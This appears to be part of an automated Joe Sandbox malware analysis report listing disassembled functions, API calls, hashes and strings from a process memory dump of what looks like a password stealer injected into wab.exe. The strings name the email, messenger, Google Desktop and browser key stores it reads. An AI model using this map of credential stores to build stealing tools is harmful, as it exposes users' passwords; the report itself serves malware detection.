                      • String ID: GROUP$H$ORDER$a GROUP BY clause is required before HAVING$aggregate functions are not allowed in the GROUP BY clause
                      • API String ID: 2221118986-3608744896
                      • Opcode ID: c279ee0335eef82b4ab2e1c99c3cadbe08c20cbdf424610957809e88121f4575
                      • Instruction ID: b2162d4513fc51f5474afcad34877166e8d447bb02b269bc62d34bb3a2ce53bd
                      • Opcode Fuzzy Hash: c279ee0335eef82b4ab2e1c99c3cadbe08c20cbdf424610957809e88121f4575
                      • Instruction Fuzzy Hash: 43B157B16087118FC720CF29E580A1BB7E5FF88314F90495FE9998B751E738E841CB9A
                      Function 004101AF Relevance: 9.1, APIs: 6, Instructions: 143COMMON
                      Download Yara Rule
                      APIs
                      • OpenProcess.KERNEL32(00000410,00000000,00000000,?,?,00000000,?,0040FE66,00000000,?), ref: 004101E6
                      • memset.MSVCRT ref: 00410246
                      • memset.MSVCRT ref: 00410258
                        • Part of subcall function 004100CC: _mbscpy.MSVCRT ref: 004100F2
                      • memset.MSVCRT ref: 0041033F
                      • _mbscpy.MSVCRT ref: 00410364
                      • CloseHandle.KERNEL32(?,0040FE66,?), ref: 004103AE
                      Memory Dump Source
                      • Source File: 00000017.00000002.1786776659.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_23_2_400000_wab.jbxd
                      Similarity
                      • API ID: memset$_mbscpy$CloseHandleOpenProcess
                      • String ID:
                      • API String ID: 3974772901-0
                      • Opcode ID: 73ffa1b9b7589030d7e14d736cd79d790de15ef6361b0a20e82543b4428b0de8
                      • Instruction ID: 1856ef5d95eaf0ecdca85a0e0a2b389725ab0ec505974788b48c76207b2fc2b2
                      • Opcode Fuzzy Hash: 73ffa1b9b7589030d7e14d736cd79d790de15ef6361b0a20e82543b4428b0de8
                      • Instruction Fuzzy Hash: FF510D7190021CABDB11DF95DD85ADEBBB8EB48305F1001AAEA19E3241D7759FC0CF69
                      Function 00444059 Relevance: 9.1, APIs: 6, Instructions: 96stringCOMMON
                      Download Yara Rule
                      APIs
                      • wcslen.MSVCRT ref: 0044406C
                      • ??2@YAPAXI@Z.MSVCRT ref: 00444075
                      • WideCharToMultiByte.KERNEL32(00000000,00000000,004441FB,000000FF,00000000,00000001,00000000,00000000,00000000,00000000,00000000,?,004441FB,?,00000000), ref: 0044408E
                        • Part of subcall function 0044338B: ??2@YAPAXI@Z.MSVCRT ref: 004433A0
                        • Part of subcall function 0044338B: ??2@YAPAXI@Z.MSVCRT ref: 004433BE
                        • Part of subcall function 0044338B: ??2@YAPAXI@Z.MSVCRT ref: 004433D9
                        • Part of subcall function 0044338B: ??2@YAPAXI@Z.MSVCRT ref: 00443402
                        • Part of subcall function 0044338B: ??2@YAPAXI@Z.MSVCRT ref: 00443426
                      • strlen.MSVCRT ref: 004440D1
                        • Part of subcall function 004434FC: ??3@YAXPAX@Z.MSVCRT ref: 00443507
                        • Part of subcall function 004434FC: ??2@YAPAXI@Z.MSVCRT ref: 00443516
                      • memcpy.MSVCRT ref: 004440EB
                      • ??3@YAXPAX@Z.MSVCRT ref: 0044417E
                      Memory Dump Source
                      • Source File: 00000017.00000002.1786776659.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_23_2_400000_wab.jbxd
                      Similarity
                      • API ID: ??2@$??3@$ByteCharMultiWidememcpystrlenwcslen
                      • String ID:
                      • API String ID: 577244452-0
                      • Opcode ID: 20a3a8ba08b433d408bc1d9acc18c6cdba7529d035fe16c150172471e115ed75
                      • Instruction ID: 3a965f982735d3f8f3afa93a9d35b3cc19a0dc4d5d85c2e22613d8d88a70f0fa
                      • Opcode Fuzzy Hash: 20a3a8ba08b433d408bc1d9acc18c6cdba7529d035fe16c150172471e115ed75
                      • Instruction Fuzzy Hash: 00317971800259AFEF21EF61C881ADDBBB4EF84314F0441AAF40863241DB396F85CF58
                      Function 00404487 Relevance: 9.1, APIs: 3, Strings: 3, Instructions: 75COMMON
                      Download Yara Rule
                      APIs
                        • Part of subcall function 00406F06: strlen.MSVCRT ref: 00406F0B
                        • Part of subcall function 00406F06: memcpy.MSVCRT ref: 00406F20
                      • _strcmpi.MSVCRT ref: 00404518
                      • _strcmpi.MSVCRT ref: 00404536
                      Strings
                      Memory Dump Source
                      • Source File: 00000017.00000002.1786776659.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_23_2_400000_wab.jbxd
                      Similarity
                      • API ID: _strcmpi$memcpystrlen
                      • String ID: imap$pop3$smtp
                      • API String ID: 2025310588-821077329
                      • Opcode ID: 508188f4cfb0bf5cabdc99a14187536ad4414849d830173f76bc96666e9cf368
                      • Instruction ID: 0633fc9c76c4ce8560d4ef140e22cd8797028ee620c68f7eda392c6b656e28f7
                      • Opcode Fuzzy Hash: 508188f4cfb0bf5cabdc99a14187536ad4414849d830173f76bc96666e9cf368
                      • Instruction Fuzzy Hash: 1F21B6B25003199BD711DB25CD42BDBB3F99F90304F10006BE749F7181DB78BB458A88
                      Function 0040C00D Relevance: 9.1, APIs: 1, Strings: 5, Instructions: 72COMMON
                      Download Yara Rule
                      APIs
                      • memset.MSVCRT ref: 0040C02D
                        • Part of subcall function 00408DB6: LoadStringA.USER32(00000000,00000006,?,?), ref: 00408E7F
                        • Part of subcall function 00408DB6: memcpy.MSVCRT ref: 00408EBE
                        • Part of subcall function 00408DB6: _mbscpy.MSVCRT ref: 00408E31
                        • Part of subcall function 00408DB6: strlen.MSVCRT ref: 00408E4F
                        • Part of subcall function 004076B7: memset.MSVCRT ref: 004076D7
                        • Part of subcall function 004076B7: sprintf.MSVCRT ref: 00407704
                        • Part of subcall function 004076B7: strlen.MSVCRT ref: 00407710
                        • Part of subcall function 004076B7: memcpy.MSVCRT ref: 00407725
                        • Part of subcall function 004076B7: strlen.MSVCRT ref: 00407733
                        • Part of subcall function 004076B7: memcpy.MSVCRT ref: 00407743
                        • Part of subcall function 004074EA: _mbscpy.MSVCRT ref: 00407550
                      Strings
                      Memory Dump Source
                      • Source File: 00000017.00000002.1786776659.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_23_2_400000_wab.jbxd
                      Similarity
                      • API ID: memcpystrlen$_mbscpymemset$LoadStringsprintf
                      • String ID: *.csv$*.htm;*.html$*.txt$*.xml$txt
                      • API String ID: 2726666094-3614832568
                      • Opcode ID: 3e9d9b7b28a717fcfc800dd2ec845bb375d33c23d26fbe9b0f9042070bfcc0ea
                      • Instruction ID: 3f197bb1c4e5ac6b46efc8a66ab6c9b366feab3e355a1f8a4a72ad5c6a94b26c
                      • Opcode Fuzzy Hash: 3e9d9b7b28a717fcfc800dd2ec845bb375d33c23d26fbe9b0f9042070bfcc0ea
                      • Instruction Fuzzy Hash: 21212CB1C002189FDB80EF95D9817DDBBB4AF68314F10417FE648B7281EF385A458B99
                      Function 0040C143 Relevance: 9.1, APIs: 6, Instructions: 54fileclipboardCOMMON
                      Download Yara Rule
                      APIs
                      • GetTempPathA.KERNEL32(00000104,?), ref: 0040C15D
                      • GetWindowsDirectoryA.KERNEL32(?,00000104), ref: 0040C16F
                      • GetTempFileNameA.KERNEL32(?,0044D644,00000000,?), ref: 0040C191
                      • OpenClipboard.USER32(?), ref: 0040C1B1
                      • GetLastError.KERNEL32 ref: 0040C1CA
                      • DeleteFileA.KERNEL32(00000000), ref: 0040C1E7
                      Memory Dump Source
                      • Source File: 00000017.00000002.1786776659.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_23_2_400000_wab.jbxd
                      Similarity
                      • API ID: FileTemp$ClipboardDeleteDirectoryErrorLastNameOpenPathWindows
                      • String ID:
                      • API String ID: 2014771361-0
                      • Opcode ID: 171ad759d1281e3ff1fcd56c2419c2c7234209d842af2eef4b8115ce05bff710
                      • Instruction ID: f62812a52b3c8d3971b783ccdfc9367edaf682a71d5855f6ec34303c2df0b61c
                      • Opcode Fuzzy Hash: 171ad759d1281e3ff1fcd56c2419c2c7234209d842af2eef4b8115ce05bff710
                      • Instruction Fuzzy Hash: 69115276600218ABDB609B61DCCDFCB77BC9F15705F0401B6B685E60A2EBB499848F68
                      Function 0040613B Relevance: 9.1, APIs: 4, Strings: 2, Instructions: 51COMMON
                      Download Yara Rule
                      APIs
                      • memcmp.MSVCRT ref: 00406151
                        • Part of subcall function 0040607F: memcmp.MSVCRT ref: 0040609D
                        • Part of subcall function 0040607F: memcpy.MSVCRT ref: 004060CC
                        • Part of subcall function 0040607F: memcpy.MSVCRT ref: 004060E1
                      • memcmp.MSVCRT ref: 0040617C
                      • memcmp.MSVCRT ref: 004061A4
                      • memcpy.MSVCRT ref: 004061C1
                      Strings
                      Memory Dump Source
                      • Source File: 00000017.00000002.1786776659.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_23_2_400000_wab.jbxd
                      Similarity
                      • API ID: memcmp$memcpy
                      • String ID: global-salt$password-check
                      • API String ID: 231171946-3927197501
                      • Opcode ID: 74ab0d982855b40a28d8c39abb951e864b1d3e85596098a6ddf56586a45c45d9
                      • Instruction ID: a9589356fa14544f03300d4f181c1951213ca66e4b0bd31de1399f3a3b520bb8
                      • Opcode Fuzzy Hash: 74ab0d982855b40a28d8c39abb951e864b1d3e85596098a6ddf56586a45c45d9
                      • Instruction Fuzzy Hash: BB01FC70A003446EEF212A128C02B4F37569F50769F014037FE0A782C3E67DD679864D
                      Function 00443473 Relevance: 9.0, APIs: 6, Instructions: 46COMMON
                      Download Yara Rule
                      APIs
                      Memory Dump Source
                      • Source File: 00000017.00000002.1786776659.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_23_2_400000_wab.jbxd
                      Similarity
                      • API ID: ??3@
                      • String ID:
                      • API String ID: 613200358-0
                      • Opcode ID: 6ed48c83ccf18aed41f75d24fb527b0a1cda54e9eb8d05dcdcbff87325985d63
                      • Instruction ID: 2c47959068043e69134c65afad444586b1a09f576c08bcd621988c2a5a0f38ec
                      • Opcode Fuzzy Hash: 6ed48c83ccf18aed41f75d24fb527b0a1cda54e9eb8d05dcdcbff87325985d63
                      • Instruction Fuzzy Hash: 3C016272E46D7167E2167E326402B8FA358AF40F2BB16010FF80477682CB2CBE5045EE
                      Function 00401694 Relevance: 9.0, APIs: 6, Instructions: 44COMMON
                      Download Yara Rule
                      APIs
                      • GetClientRect.USER32(?,?), ref: 004016A3
                      • GetSystemMetrics.USER32(00000015), ref: 004016B1
                      • GetSystemMetrics.USER32(00000014), ref: 004016BD
                      • BeginPaint.USER32(?,?), ref: 004016D7
                      • DrawFrameControl.USER32(00000000,?,00000003,00000008), ref: 004016E6
                      • EndPaint.USER32(?,?), ref: 004016F3
                      Memory Dump Source
                      • Source File: 00000017.00000002.1786776659.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_23_2_400000_wab.jbxd
                      Similarity
                      • API ID: MetricsPaintSystem$BeginClientControlDrawFrameRect
                      • String ID:
                      • API String ID: 19018683-0
                      • Opcode ID: 41a9f68717181b3a98dd3cb882205833d46fa89c93d8a9d4005197e1a3202613
                      • Instruction ID: cf01e476fd02228c824cf2568a7310e823bc3a91870265851f050ef0b1242b16
                      • Opcode Fuzzy Hash: 41a9f68717181b3a98dd3cb882205833d46fa89c93d8a9d4005197e1a3202613
                      • Instruction Fuzzy Hash: 81012C76900218AFDF44DFE4DC849EE7B79FB45301F040569EA11AA1A4DAB0A904CB50
                      Function 004063B2 Relevance: 8.9, APIs: 7, Instructions: 157COMMON
                      Download Yara Rule
                      APIs
                      • memset.MSVCRT ref: 0040644F
                      • memcpy.MSVCRT ref: 00406462
                      • memcpy.MSVCRT ref: 00406475
                        • Part of subcall function 00404888: memset.MSVCRT ref: 004048C2
                        • Part of subcall function 00404888: memset.MSVCRT ref: 004048D6
                        • Part of subcall function 00404888: memset.MSVCRT ref: 004048EA
                        • Part of subcall function 00404888: memcpy.MSVCRT ref: 004048FC
                        • Part of subcall function 00404888: memcpy.MSVCRT ref: 0040490E
                      • memcpy.MSVCRT ref: 004064B9
                      • memcpy.MSVCRT ref: 004064CC
                      • memcpy.MSVCRT ref: 004064F9
                      • memcpy.MSVCRT ref: 0040650E
                        • Part of subcall function 00406286: memcpy.MSVCRT ref: 004062B2
                      Memory Dump Source
                      • Source File: 00000017.00000002.1786776659.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_23_2_400000_wab.jbxd
                      Similarity
                      • API ID: memcpy$memset
                      • String ID:
                      • API String ID: 438689982-0
                      • Opcode ID: d6e541f26a2e21c8c6d6048cbe16156117454f978ff945f7822072589e58f8d2
                      • Instruction ID: e4a864fa4e69ec142fe4fd7b7713e32d962165e503c4b70a0fc0dcfbb4c29d3a
                      • Opcode Fuzzy Hash: d6e541f26a2e21c8c6d6048cbe16156117454f978ff945f7822072589e58f8d2
                      • Instruction Fuzzy Hash: 41415FB290054DBEEB51DAE9CC41EEFBB7CAB48344F004476F708F7151E634AA498BA5
                      Function 004032B7 Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 82stringCOMMON
                      Download Yara Rule
                      APIs
                        • Part of subcall function 00403166: strchr.MSVCRT ref: 0040327B
                      • memset.MSVCRT ref: 0040330B
                      • GetPrivateProfileSectionA.KERNEL32(Personalities,?,000003FE,?), ref: 00403325
                      • strchr.MSVCRT ref: 0040335A
                        • Part of subcall function 004023E5: _mbsicmp.MSVCRT ref: 0040241D
                      • strlen.MSVCRT ref: 0040339C
                        • Part of subcall function 004023E5: _mbscmp.MSVCRT ref: 004023F9
                      Strings
                      Memory Dump Source
                      • Source File: 00000017.00000002.1786776659.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_23_2_400000_wab.jbxd
                      Similarity
                      • API ID: strchr$PrivateProfileSection_mbscmp_mbsicmpmemsetstrlen
                      • String ID: Personalities
                      • API String ID: 2103853322-4287407858
                      • Opcode ID: bc8f70af08f30ec4db56d6fcc791bb65d74b30dbc9844da0e0792c070d737bbb
                      • Instruction ID: 7d10b282734f65fdb38f5d5bab0bdada953f1de7ece3d1168d652590bcd45cd6
                      • Opcode Fuzzy Hash: bc8f70af08f30ec4db56d6fcc791bb65d74b30dbc9844da0e0792c070d737bbb
                      • Instruction Fuzzy Hash: 6C21A872A041486AEB11EF699C81ADEBB7C9B51305F14007BFB04F7181DA7CDB46C66D
                      Function 00410863 Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 54COMMON
                      Download Yara Rule
                      APIs
                      • UuidFromStringA.RPCRT4(5e7e8100-9138-11d1-945a-00c04fc308ff,?), ref: 0041087A
                      • UuidFromStringA.RPCRT4(00000000-0000-0000-0000-000000000000,?), ref: 00410887
                      • memcpy.MSVCRT ref: 004108C3
                      Strings
                      • 5e7e8100-9138-11d1-945a-00c04fc308ff, xrefs: 00410875
                      • 00000000-0000-0000-0000-000000000000, xrefs: 00410882
                      Memory Dump Source
                      • Source File: 00000017.00000002.1786776659.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_23_2_400000_wab.jbxd
                      Similarity
                      • API ID: FromStringUuid$memcpy
                      • String ID: 00000000-0000-0000-0000-000000000000$5e7e8100-9138-11d1-945a-00c04fc308ff
                      • API String ID: 2859077140-3316789007
                      • Opcode ID: 1bd0dfdd33b944ccaa92fc0adafc19938dd855d0ba2d869dfbea71798e3d1944
                      • Instruction ID: 2d05171d55a2aa7530ad5e51965ca7b7e6a6868cf32f938cfe5ee3e9f977ce1c
                      • Opcode Fuzzy Hash: 1bd0dfdd33b944ccaa92fc0adafc19938dd855d0ba2d869dfbea71798e3d1944
                      • Instruction Fuzzy Hash: BD016D7690412DBADF01AE95CD40EEB7BACEF49354F044123FD15E6150E6B8EA84CBE4
                      Function 00444551 Relevance: 8.8, APIs: 2, Strings: 3, Instructions: 51registryCOMMON
                      Download Yara Rule
                      APIs
                      • memset.MSVCRT ref: 00444573
                        • Part of subcall function 00410A9C: RegOpenKeyExA.KERNELBASE(00401C4C,00401C4C,00000000,00020019,?,00401C4C,?,?,?), ref: 00410AAF
                        • Part of subcall function 00410ADD: RegQueryValueExA.ADVAPI32(?,?,00000000,?,00401C6A,?,?,?,?,00401C6A,?,?,?), ref: 00410AF8
                      • RegCloseKey.ADVAPI32(?,?,?,?,?,?,?,?,?,000003FF), ref: 004445DF
                      Strings
                      Memory Dump Source
                      • Source File: 00000017.00000002.1786776659.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_23_2_400000_wab.jbxd
                      Similarity
                      • API ID: CloseOpenQueryValuememset
                      • String ID: EOptions string$Software\Yahoo\Pager$Yahoo! User ID
                      • API String ID: 1830152886-1703613266
                      • Opcode ID: baf3755ad005164e852b951840563bf60568ed10c800e15668adf960084471f0
                      • Instruction ID: e49b40feb516e52fd010a51085a75c79e183d02607987ed0dc43077d9115a6c0
                      • Opcode Fuzzy Hash: baf3755ad005164e852b951840563bf60568ed10c800e15668adf960084471f0
                      • Instruction Fuzzy Hash: E80196B6A00118BBEF11AA569D01F9A777CDF90355F1000A6FF08F2212E6749F599698
                      Function 0043D62C Relevance: 7.7, APIs: 4, Strings: 1, Instructions: 224COMMON
                      Download Yara Rule
                      APIs
                      Strings
                      Memory Dump Source
                      • Source File: 00000017.00000002.1786776659.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_23_2_400000_wab.jbxd
                      Similarity
                      • API ID: memset
                      • String ID: H
                      • API String ID: 2221118986-2852464175
                      • Opcode ID: b7a38b27e5c8f908588e1f47af6482a11fcf8a0e9f714cd4a67b4b1e91083b9c
                      • Instruction ID: 41a1901620add3bbd0c629c105807ca0f7ae5b253a5bd6696a221ab72d79fc9a
                      • Opcode Fuzzy Hash: b7a38b27e5c8f908588e1f47af6482a11fcf8a0e9f714cd4a67b4b1e91083b9c
                      • Instruction Fuzzy Hash: C0916C75D00219DFDF24DFA5D881AEEB7B5FF48300F10849AE959AB201E734AA45CF98
                      Function 0042563B Relevance: 7.7, APIs: 2, Strings: 3, Instructions: 176COMMON
                      Download Yara Rule
                      APIs
                      Strings
                      Memory Dump Source
                      • Source File: 00000017.00000002.1786776659.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_23_2_400000_wab.jbxd
                      Similarity
                      • API ID: memcpy
                      • String ID: out of memory$statement aborts at %d: [%s] %s$string or blob too big
                      • API String ID: 3510742995-3170954634
                      • Opcode ID: f23b84750750ded9f2ffe7c3d94913c2e203849674d50945dde1510e429b7173
                      • Instruction ID: e987c9c84479fff69dc62f11a90029b17cbd8b5ab9a96ddea988199e68ce63eb
                      • Opcode Fuzzy Hash: f23b84750750ded9f2ffe7c3d94913c2e203849674d50945dde1510e429b7173
                      • Instruction Fuzzy Hash: 2361C235B006259FCB04DF68E484BAEFBF1BF44314F55809AE904AB352D738E980CB98
                      Function 00414625 Relevance: 7.6, APIs: 3, Strings: 2, Instructions: 132COMMON
                      Download Yara Rule
                      APIs
                      Strings
                      Memory Dump Source
                      • Source File: 00000017.00000002.1786776659.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_23_2_400000_wab.jbxd
                      Similarity
                      • API ID: memcpy$memset
                      • String ID: winWrite1$winWrite2
                      • API String ID: 438689982-3457389245
                      • Opcode ID: ce9cd4edfa8dbd859274d61cf42db9548f248045a44c52f6141926f4a5991765
                      • Instruction ID: c2532708ffcca3880dfc28061b61c902a2330187b6102c2a8a28e688d44e82e0
                      • Opcode Fuzzy Hash: ce9cd4edfa8dbd859274d61cf42db9548f248045a44c52f6141926f4a5991765
                      • Instruction Fuzzy Hash: 86418072A00209EBDF00DF95CC85BDE7775FF85315F14411AE924A7280D778EAA4CB99
                      Function 004144FD Relevance: 7.6, APIs: 4, Strings: 1, Instructions: 109COMMON
                      Download Yara Rule
                      APIs
                      Strings
                      Memory Dump Source
                      • Source File: 00000017.00000002.1786776659.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_23_2_400000_wab.jbxd
                      Similarity
                      • API ID: memcpymemset
                      • String ID: winRead
                      • API String ID: 1297977491-2759563040
                      • Opcode ID: 514c1e3a0802e780418d6592697ed91d227734cf7519c01181e8c1f66eabfdc8
                      • Instruction ID: 3ec02e552038d814b148e8dc6d2e6fcfdb14063e9eab1ef980803e4d567ed084
                      • Opcode Fuzzy Hash: 514c1e3a0802e780418d6592697ed91d227734cf7519c01181e8c1f66eabfdc8
                      • Instruction Fuzzy Hash: DC31C372A00218ABDF10DF69CC46ADF776AEF84314F184026FE14DB241D334EE948BA9
                      Function 00449550 Relevance: 7.6, APIs: 4, Strings: 1, Instructions: 85COMMON
                      Download Yara Rule
                      APIs
                      Strings
                      Memory Dump Source
                      • Source File: 00000017.00000002.1786776659.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_23_2_400000_wab.jbxd
                      Similarity
                      • API ID: memcpymemset
                      • String ID: gj
                      • API String ID: 1297977491-4203073231
                      • Opcode ID: 0d816628dddfc205dc81bb0cef5ba6c08625cdf510402cfd9794fe58c3b1b53e
                      • Instruction ID: 902d5c3a1247e7abcff0c4a84da7d54d3a467651d8a5431b25503c8ae0e770b6
                      • Opcode Fuzzy Hash: 0d816628dddfc205dc81bb0cef5ba6c08625cdf510402cfd9794fe58c3b1b53e
                      • Instruction Fuzzy Hash: AF216A733443402BF7259A3ACC41B5B775DDFCA318F16041EF68A8B342E67AEA058715
                      Function 004090B0 Relevance: 7.5, APIs: 5, Instructions: 49COMMON
                      Download Yara Rule
                      APIs
                      • GetParent.USER32(?), ref: 004090C2
                      • GetWindowRect.USER32(?,?), ref: 004090CF
                      • GetClientRect.USER32(00000000,?), ref: 004090DA
                      • MapWindowPoints.USER32(00000000,00000000,?,00000002), ref: 004090EA
                      • SetWindowPos.USER32(?,00000000,?,00000001,00000000,00000000,00000005), ref: 00409106
                      Memory Dump Source
                      • Source File: 00000017.00000002.1786776659.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_23_2_400000_wab.jbxd
                      Similarity
                      • API ID: Window$Rect$ClientParentPoints
                      • String ID:
                      • API String ID: 4247780290-0
                      • Opcode ID: 0881872b442e91a884b62adcb4090c2e31bdfe9a46a4641592ad1aca8c145518
                      • Instruction ID: bdfce0b549e0f997c013470e25be1f804495b962c90005f3873202e4793523b9
                      • Opcode Fuzzy Hash: 0881872b442e91a884b62adcb4090c2e31bdfe9a46a4641592ad1aca8c145518
                      • Instruction Fuzzy Hash: 6A012D36801129BBDB119FA59C89EFFBFBCFF46750F044125FD05A2141D77455018BA5
                      Function 00410777 Relevance: 7.5, APIs: 5, Instructions: 40COMMON
                      Download Yara Rule
                      APIs
                        • Part of subcall function 00407107: memset.MSVCRT ref: 00407127
                        • Part of subcall function 00407107: GetClassNameA.USER32(?,00000000,000000FF), ref: 0040713A
                        • Part of subcall function 00407107: _strcmpi.MSVCRT ref: 0040714C
                      • SetBkMode.GDI32(?,00000001), ref: 0041079E
                      • GetSysColor.USER32(00000005), ref: 004107A6
                      • SetBkColor.GDI32(?,00000000), ref: 004107B0
                      • SetTextColor.GDI32(?,00C00000), ref: 004107BE
                      • GetSysColorBrush.USER32(00000005), ref: 004107C6
                      Memory Dump Source
                      • Source File: 00000017.00000002.1786776659.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_23_2_400000_wab.jbxd
                      Similarity
                      • API ID: Color$BrushClassModeNameText_strcmpimemset
                      • String ID:
                      • API String ID: 2775283111-0
                      • Opcode ID: 30732ddb99e3546892e286b48803550164489c166bef4c71f88bf4e2e56830df
                      • Instruction ID: 687cb18978465a3feaaa07aa3b8de37e8775815fe2b8de28c5581ef0bdca0d30
                      • Opcode Fuzzy Hash: 30732ddb99e3546892e286b48803550164489c166bef4c71f88bf4e2e56830df
                      • Instruction Fuzzy Hash: AAF03135101109BBCF112FA5DC49ADE3F25EF05711F14812AFA25A85F1CBB5A990DF58
                      Function 0041479C Relevance: 7.1, APIs: 1, Strings: 3, Instructions: 96COMMON
                      Download Yara Rule
                      APIs
                      • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 004147CE
                      Strings
                      Memory Dump Source
                      • Source File: 00000017.00000002.1786776659.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_23_2_400000_wab.jbxd
                      Similarity
                      • API ID: Unothrow_t@std@@@__ehfuncinfo$??2@
                      • String ID: winSeekFile$winTruncate1$winTruncate2
                      • API String ID: 885266447-2471937615
                      • Opcode ID: 3989f365befeb7fb84bae78e7a4911c3188eb7aafc144da4ed62710c54f6e9f9
                      • Instruction ID: 76c2d8f9c45a6ab14154b13c081d04d7f34c1e3f6c53ca943db3ce1179081271
                      • Opcode Fuzzy Hash: 3989f365befeb7fb84bae78e7a4911c3188eb7aafc144da4ed62710c54f6e9f9
                      • Instruction Fuzzy Hash: 5C313175600700AFE720AF65CC41EABB7E8FB88715F104A2EF965932D1D734E8808B29
                      Function 0040E103 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 62COMMON
                      Download Yara Rule
                      APIs
                      Strings
                      Memory Dump Source
                      • Source File: 00000017.00000002.1786776659.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_23_2_400000_wab.jbxd
                      Similarity
                      • API ID: _strcmpi$_mbscpy
                      • String ID: smtp
                      • API String ID: 2625860049-60245459
                      • Opcode ID: c45caa4284447f7f2e2e6364178d5851a287a2bec06db597c6e622e98960e237
                      • Instruction ID: 1dd5f7db1b4edf1a80ad81ce147274c535078e8a2a303909ef95c05f23963bac
                      • Opcode Fuzzy Hash: c45caa4284447f7f2e2e6364178d5851a287a2bec06db597c6e622e98960e237
                      • Instruction Fuzzy Hash: DB11C872500219ABEB10AB66CC41A8A7399EF40358F10453BE945F71C2EF39E9698B98
                      Function 0040821D Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 61registryCOMMON
                      Download Yara Rule
                      APIs
                        • Part of subcall function 00410A9C: RegOpenKeyExA.KERNELBASE(00401C4C,00401C4C,00000000,00020019,?,00401C4C,?,?,?), ref: 00410AAF
                      • memset.MSVCRT ref: 00408258
                        • Part of subcall function 00410B62: RegEnumKeyExA.ADVAPI32(00000000,?,?,000000FF,00000000,00000000,00000000,?,?,00000000), ref: 00410B85
                      • RegCloseKey.ADVAPI32(?,?,?,?,?,?,?,?,?,?,?,00000000,000000FF,?,?,?), ref: 004082A6
                      • RegCloseKey.ADVAPI32(?,?,?,?,?,?,?,?,?,?,?,00000000,000000FF,?,?,?), ref: 004082C3
                      Strings
                      • Software\Google\Google Desktop\Mailboxes, xrefs: 00408230
                      Memory Dump Source
                      • Source File: 00000017.00000002.1786776659.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_23_2_400000_wab.jbxd
                      Similarity
                      • API ID: Close$EnumOpenmemset
                      • String ID: Software\Google\Google Desktop\Mailboxes
                      • API String ID: 2255314230-2212045309
                      • Opcode ID: b9c6ba0a09f39c77023865a56f43d31249d27d4aeb116fb61def55debc704f1d
                      • Instruction ID: e7ff4aa50d33639bacb2d5000aefce928628a80d8311d3545e17288fa3d3d8ee
                      • Opcode Fuzzy Hash: b9c6ba0a09f39c77023865a56f43d31249d27d4aeb116fb61def55debc704f1d
                      • Instruction Fuzzy Hash: 9D118F72408345ABD710EE51DC01EABBBACEFD0344F04093EBD9491091EB75D958C6AA
                      Function 0040C26C Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 43windowCOMMON
                      Download Yara Rule
                      APIs
                      • memset.MSVCRT ref: 0040C28C
                      • SetFocus.USER32(?,?), ref: 0040C314
                        • Part of subcall function 0040C256: PostMessageA.USER32(?,00000415,00000000,00000000), ref: 0040C265
                      Strings
                      Memory Dump Source
                      • Source File: 00000017.00000002.1786776659.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                      Joe Sandbox IDA Plugin
